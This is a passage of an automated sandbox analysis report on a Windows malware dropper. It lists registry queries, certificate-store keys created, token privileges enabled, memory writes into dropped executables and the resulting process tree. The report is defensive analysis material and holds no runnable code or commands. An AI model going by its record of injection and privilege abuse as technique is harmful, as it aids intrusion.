Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | Setup.tmp
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | Setup.tmp
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS |
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU |
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | Esplorarne.exe.com
-
Modifies data under HKEY_USERS 43 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | sihclient.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | sihclient.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | sihclient.exe
Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | sihclient.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 108 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 130 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 137 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 138 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 243 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 247 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 106 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
4608 | WerFault.exe
4608 | WerFault.exe
3736 | WerFault.exe
3736 | WerFault.exe
3660 | WerFault.exe
3660 | WerFault.exe
3764 | jfiag3g_gg.exe
3764 | jfiag3g_gg.exe
3548 | WerFault.exe
3548 | WerFault.exe
4464 | File.exe
4464 | File.exe
4464 | File.exe
4464 | File.exe
4464 | File.exe
4464 | File.exe
4464 | File.exe
4464 | File.exe
4464 | File.exe
4464 | File.exe
668 | WerFault.exe
668 | WerFault.exe
3832 | WerFault.exe
3832 | WerFault.exe
4164 | WerFault.exe
4164 | WerFault.exe
2184 | WerFault.exe
2184 | WerFault.exe
2796 | WerFault.exe
2796 | WerFault.exe
4824 | WerFault.exe
4824 | WerFault.exe
3532 | WerFault.exe
3532 | WerFault.exe
1684 | MaskVPNUpdate.exe
1684 | MaskVPNUpdate.exe
5508 | Setup.tmp
5508 | Setup.tmp
1004 | Esplorarne.exe.com
1004 | Esplorarne.exe.com
3424 | Esplorarne.exe.com
3424 | Esplorarne.exe.com
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
1432 | xtect12.exe
-
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
pid | process
5000 | 6798012.exe
1996 | 4116312.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeCreateTokenPrivilege | 744 | Install.exe
Token: SeAssignPrimaryTokenPrivilege | 744 | Install.exe
Token: SeLockMemoryPrivilege | 744 | Install.exe
Token: SeIncreaseQuotaPrivilege | 744 | Install.exe
Token: SeMachineAccountPrivilege | 744 | Install.exe
Token: SeTcbPrivilege | 744 | Install.exe
Token: SeSecurityPrivilege | 744 | Install.exe
Token: SeTakeOwnershipPrivilege | 744 | Install.exe
Token: SeLoadDriverPrivilege | 744 | Install.exe
Token: SeSystemProfilePrivilege | 744 | Install.exe
Token: SeSystemtimePrivilege | 744 | Install.exe
Token: SeProfSingleProcessPrivilege | 744 | Install.exe
Token: SeIncBasePriorityPrivilege | 744 | Install.exe
Token: SeCreatePagefilePrivilege | 744 | Install.exe
Token: SeCreatePermanentPrivilege | 744 | Install.exe
Token: SeBackupPrivilege | 744 | Install.exe
Token: SeRestorePrivilege | 744 | Install.exe
Token: SeShutdownPrivilege | 744 | Install.exe
Token: SeDebugPrivilege | 744 | Install.exe
Token: SeAuditPrivilege | 744 | Install.exe
Token: SeSystemEnvironmentPrivilege | 744 | Install.exe
Token: SeChangeNotifyPrivilege | 744 | Install.exe
Token: SeRemoteShutdownPrivilege | 744 | Install.exe
Token: SeUndockPrivilege | 744 | Install.exe
Token: SeSyncAgentPrivilege | 744 | Install.exe
Token: SeEnableDelegationPrivilege | 744 | Install.exe
Token: SeManageVolumePrivilege | 744 | Install.exe
Token: SeImpersonatePrivilege | 744 | Install.exe
Token: SeCreateGlobalPrivilege | 744 | Install.exe
Token: 31 | 744 | Install.exe
Token: 32 | 744 | Install.exe
Token: 33 | 744 | Install.exe
Token: 34 | 744 | Install.exe
Token: 35 | 744 | Install.exe
Token: SeRestorePrivilege | 4608 | WerFault.exe
Token: SeBackupPrivilege | 4608 | WerFault.exe
Token: SeBackupPrivilege | 4608 | WerFault.exe
Token: SeDebugPrivilege | 3900 | KRSetp.exe
Token: SeManageVolumePrivilege | 3124 | md9_1sjm.exe
Token: SeManageVolumePrivilege | 3124 | md9_1sjm.exe
Token: SeManageVolumePrivilege | 3124 | md9_1sjm.exe
Token: SeManageVolumePrivilege | 3124 | md9_1sjm.exe
Token: SeManageVolumePrivilege | 3124 | md9_1sjm.exe
Token: SeDebugPrivilege | 2988 | 2u55W290oBvJVcrb8gcaR3aD.exe
Token: SeDebugPrivilege | 1252 | fy9NfATq_QWOepz6ymSl2HMo.exe
Token: SeDebugPrivilege | 3068 | svchost.exe
Token: SeDebugPrivilege | 3424 | Esplorarne.exe.com
Token: SeDebugPrivilege | 3712 | 6609898.exe
Token: SeDebugPrivilege | 1004 | Esplorarne.exe.com
Token: SeDebugPrivilege | 5116 | tjy1GrraGlAjKtsTJ6fwTeqw.exe
Token: SeDebugPrivilege | 4308 | dcN39oeQcO1TI8LbRct_X8zm.exe
Token: SeCreateTokenPrivilege | 2384 | askinstall53.exe
Token: SeAssignPrimaryTokenPrivilege | 2384 | askinstall53.exe
Token: SeLockMemoryPrivilege | 2384 | askinstall53.exe
Token: SeIncreaseQuotaPrivilege | 2384 | askinstall53.exe
Token: SeMachineAccountPrivilege | 2384 | askinstall53.exe
Token: SeTcbPrivilege | 2384 | askinstall53.exe
Token: SeSecurityPrivilege | 2384 | askinstall53.exe
Token: SeTakeOwnershipPrivilege | 2384 | askinstall53.exe
Token: SeLoadDriverPrivilege | 2384 | askinstall53.exe
Token: SeSystemProfilePrivilege | 2384 | askinstall53.exe
Token: SeSystemtimePrivilege | 2384 | askinstall53.exe
Token: SeProfSingleProcessPrivilege | 2384 | askinstall53.exe
Token: SeIncBasePriorityPrivilege | 2384 | askinstall53.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
pid | process
1268 | jamesold.exe
1268 | jamesold.exe
1268 | jamesold.exe
1268 | jamesold.exe
1268 | jamesold.exe
1268 | jamesold.exe
1268 | jamesold.exe
2792 | YqIXiCL33maLAy2OB92ojfwd.tmp
2508 | Cleaner Installation.exe
1244 | Inlog.tmp
2332 | Conhost.exe
2840 | VPN.tmp
132 | Setup.exe
6892 | t32Ur7ILpInlYyJRLs12SnLx.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
5508 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
4276 | Setup.tmp
-
Suspicious use of SendNotifyMessage 13 IoCs
Processes:
pid | process
1268 | jamesold.exe
1268 | jamesold.exe
1268 | jamesold.exe
1268 | jamesold.exe
1268 | jamesold.exe
1268 | jamesold.exe
1268 | jamesold.exe
6988 | Esplorarne.exe.com
6988 | Esplorarne.exe.com
6988 | Esplorarne.exe.com
6664 | Esplorarne.exe.com
6664 | Esplorarne.exe.com
6664 | Esplorarne.exe.com
-
Suspicious use of SetWindowsHookEx 56 IoCs
Processes:
pid | process
4464 | File.exe
3904 | gq7BdFzcCpgT9R8qUlDBiVoJ.exe
5080 | AE4Cr0V8AbXUi2Vh3WIgJzcr.exe
4612 | TNGkwm8vY3ofA8gUTLfxgcxK.exe
1480 | Y7aLf8zJ97XcPikNEtC8S9tn.exe
3712 | 2D6KXJ4Sih2rnKqehqnnaTsh.exe
3896 | ZH_D8d_woMBuwaliVLK7dXsO.exe
3636 | HigBkRPx0qyWn99cHptOkbti.exe
3176 | YqIXiCL33maLAy2OB92ojfwd.exe
4200 | customer3.exe
2792 | YqIXiCL33maLAy2OB92ojfwd.tmp
2712 | n5iK85pyxBdO3WOr6bRNQ6xx.exe
3428 | msedge.exe
804 | 8473479.exe
4844 | n5iK85pyxBdO3WOr6bRNQ6xx.exe
1396 | 11111.exe
1524 | LGCH2-401_2021-08-18_14-40.exe
2144 | Inlog.exe
1264 | WEATHER Manager.exe
1244 | Inlog.tmp
860 | Esplorarne.exe.com
2380 | VPN.exe
2332 | Conhost.exe
2840 | VPN.tmp
2384 | askinstall53.exe
3948 | MediaBurner2.exe
5388 | MediaBurner2.tmp
5468 | 11111.exe
1684 | MaskVPNUpdate.exe
4228 | 11111.exe
1432 | xtect12.exe
5356 | zhaoy-game.exe
132 | Setup.exe
2828 | zhaoy-game.exe
6248 | bEQOSwZfLy35v67HMStZes1l.exe
6264 | WerFault.exe
6384 | PSFJVLwun3TcfKuUSaxkpg3c.exe
6392 | msedge.exe
6236 | msedge.exe
6492 | asMNUD7Whzsx89sAGP_aLokg.exe
6416 | t32Ur7ILpInlYyJRLs12SnLx.exe
4640 | WchvfjN_dzKFtUxFm7qRXxfF.exe
4572 | pCuweAs8rFE1CgxW49f5aXKk.exe
6892 | t32Ur7ILpInlYyJRLs12SnLx.tmp
7020 | Setup.exe
736 | tmp9432_tmp.exe
4276 | Setup.tmp
584 | Setup.exe
5508 | Setup.tmp
1544 | pCuweAs8rFE1CgxW49f5aXKk.exe
4112 | Setup.exe
4020 | svchost.exe
5276 | svrwebui.exe
5132 | vdi_compiler.exe
6988 | Esplorarne.exe.com
6664 | Esplorarne.exe.com
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 3832 wrote to memory of 3900 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | KRSetp.exe
PID 3832 wrote to memory of 3900 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | KRSetp.exe
PID 3832 wrote to memory of 3528 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Folder.exe
PID 3832 wrote to memory of 3528 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Folder.exe
PID 3832 wrote to memory of 3528 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Folder.exe
PID 3832 wrote to memory of 3792 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Info.exe
PID 3832 wrote to memory of 3792 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Info.exe
PID 3832 wrote to memory of 3792 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Info.exe
PID 3832 wrote to memory of 4464 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | File.exe
PID 3832 wrote to memory of 4464 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | File.exe
PID 3832 wrote to memory of 4464 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | File.exe
PID 3832 wrote to memory of 860 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | pub2.exe
PID 3832 wrote to memory of 860 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | pub2.exe
PID 3832 wrote to memory of 860 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | pub2.exe
PID 3832 wrote to memory of 744 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Install.exe
PID 3832 wrote to memory of 744 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Install.exe
PID 3832 wrote to memory of 744 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Install.exe
PID 3832 wrote to memory of 1268 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | jamesold.exe
PID 3832 wrote to memory of 1268 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | jamesold.exe
PID 3832 wrote to memory of 1268 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | jamesold.exe
PID 3832 wrote to memory of 3124 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | md9_1sjm.exe
PID 3832 wrote to memory of 3124 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | md9_1sjm.exe
PID 3832 wrote to memory of 3124 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | md9_1sjm.exe
PID 3832 wrote to memory of 1888 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Files.exe
PID 3832 wrote to memory of 1888 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Files.exe
PID 3832 wrote to memory of 1888 | 3832 | C0672CA6E505B76756AC421EF9D33409.bin.exe | Files.exe
PID 2108 wrote to memory of 860 | 2108 | WerFault.exe | pub2.exe
PID 2108 wrote to memory of 860 | 2108 | WerFault.exe | pub2.exe
PID 4620 wrote to memory of 3792 | 4620 | WerFault.exe | Info.exe
PID 4620 wrote to memory of 3792 | 4620 | WerFault.exe | Info.exe
PID 3528 wrote to memory of 3480 | 3528 | Folder.exe | Folder.exe
PID 3528 wrote to memory of 3480 | 3528 | Folder.exe | Folder.exe
PID 3528 wrote to memory of 3480 | 3528 | Folder.exe | Folder.exe
PID 1888 wrote to memory of 1672 | 1888 | Files.exe | jfiag3g_gg.exe
PID 1888 wrote to memory of 1672 | 1888 | Files.exe | jfiag3g_gg.exe
PID 1888 wrote to memory of 1672 | 1888 | Files.exe | jfiag3g_gg.exe
PID 3788 wrote to memory of 2288 | 3788 | rUNdlL32.eXe | rundll32.exe
PID 3788 wrote to memory of 2288 | 3788 | rUNdlL32.eXe | rundll32.exe
PID 3788 wrote to memory of 2288 | 3788 | rUNdlL32.eXe | rundll32.exe
PID 4592 wrote to memory of 2288 | 4592 | WerFault.exe | rundll32.exe
PID 4592 wrote to memory of 2288 | 4592 | WerFault.exe | rundll32.exe
PID 1888 wrote to memory of 3764 | 1888 | Files.exe | jfiag3g_gg.exe
PID 1888 wrote to memory of 3764 | 1888 | Files.exe | jfiag3g_gg.exe
PID 1888 wrote to memory of 3764 | 1888 | Files.exe | jfiag3g_gg.exe
PID 4628 wrote to memory of 744 | 4628 | WerFault.exe | Install.exe
PID 4628 wrote to memory of 744 | 4628 | WerFault.exe | Install.exe
PID 4464 wrote to memory of 3904 | 4464 | File.exe | gq7BdFzcCpgT9R8qUlDBiVoJ.exe
PID 4464 wrote to memory of 3904 | 4464 | File.exe | gq7BdFzcCpgT9R8qUlDBiVoJ.exe
PID 4464 wrote to memory of 3904 | 4464 | File.exe | gq7BdFzcCpgT9R8qUlDBiVoJ.exe
PID 4464 wrote to memory of 5080 | 4464 | File.exe | AE4Cr0V8AbXUi2Vh3WIgJzcr.exe
PID 4464 wrote to memory of 5080 | 4464 | File.exe | AE4Cr0V8AbXUi2Vh3WIgJzcr.exe
PID 4464 wrote to memory of 5080 | 4464 | File.exe | AE4Cr0V8AbXUi2Vh3WIgJzcr.exe
PID 4464 wrote to memory of 4612 | 4464 | File.exe | TNGkwm8vY3ofA8gUTLfxgcxK.exe
PID 4464 wrote to memory of 4612 | 4464 | File.exe | TNGkwm8vY3ofA8gUTLfxgcxK.exe
PID 4464 wrote to memory of 4612 | 4464 | File.exe | TNGkwm8vY3ofA8gUTLfxgcxK.exe
PID 4464 wrote to memory of 1252 | 4464 | File.exe | fy9NfATq_QWOepz6ymSl2HMo.exe
PID 4464 wrote to memory of 1252 | 4464 | File.exe | fy9NfATq_QWOepz6ymSl2HMo.exe
PID 4464 wrote to memory of 1252 | 4464 | File.exe | fy9NfATq_QWOepz6ymSl2HMo.exe
PID 4464 wrote to memory of 5116 | 4464 | File.exe | tjy1GrraGlAjKtsTJ6fwTeqw.exe
PID 4464 wrote to memory of 5116 | 4464 | File.exe | tjy1GrraGlAjKtsTJ6fwTeqw.exe
PID 4464 wrote to memory of 5116 | 4464 | File.exe | tjy1GrraGlAjKtsTJ6fwTeqw.exe
PID 4464 wrote to memory of 1856 | 4464 | File.exe | KlF1TC_kNM1irfli5mSNl_JB.exe
PID 4464 wrote to memory of 1856 | 4464 | File.exe | KlF1TC_kNM1irfli5mSNl_JB.exe
PID 4464 wrote to memory of 1856 | 4464 | File.exe | KlF1TC_kNM1irfli5mSNl_JB.exe
Processes
-
Each entry gives the process tree depth in brackets, the image path, the recorded command line, and the signatures matched for that process.

[1] C:\Users\Admin\AppData\Local\Temp\C0672CA6E505B76756AC421EF9D33409.bin.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\C0672CA6E505B76756AC421EF9D33409.bin.exe"
    - Suspicious use of WriteProcessMemory

[2] C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[2] C:\Users\Admin\AppData\Local\Temp\Folder.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

[3] C:\Users\Admin\AppData\Local\Temp\Folder.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
    - Executes dropped EXE

[2] C:\Users\Admin\AppData\Local\Temp\Info.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Info.exe"
    - Executes dropped EXE

[3] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3792 -s 280
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses

[2] C:\Users\Admin\AppData\Local\Temp\File.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\File.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

[3] C:\Users\Admin\Documents\fy9NfATq_QWOepz6ymSl2HMo.exe
    Command line: "C:\Users\Admin\Documents\fy9NfATq_QWOepz6ymSl2HMo.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[3] C:\Users\Admin\Documents\AE4Cr0V8AbXUi2Vh3WIgJzcr.exe
    Command line: "C:\Users\Admin\Documents\AE4Cr0V8AbXUi2Vh3WIgJzcr.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[4] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 280
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses

[3] C:\Users\Admin\Documents\TNGkwm8vY3ofA8gUTLfxgcxK.exe
    Command line: "C:\Users\Admin\Documents\TNGkwm8vY3ofA8gUTLfxgcxK.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[4] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 276
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses

[3] C:\Users\Admin\Documents\gq7BdFzcCpgT9R8qUlDBiVoJ.exe
    Command line: "C:\Users\Admin\Documents\gq7BdFzcCpgT9R8qUlDBiVoJ.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[4] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 276
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses

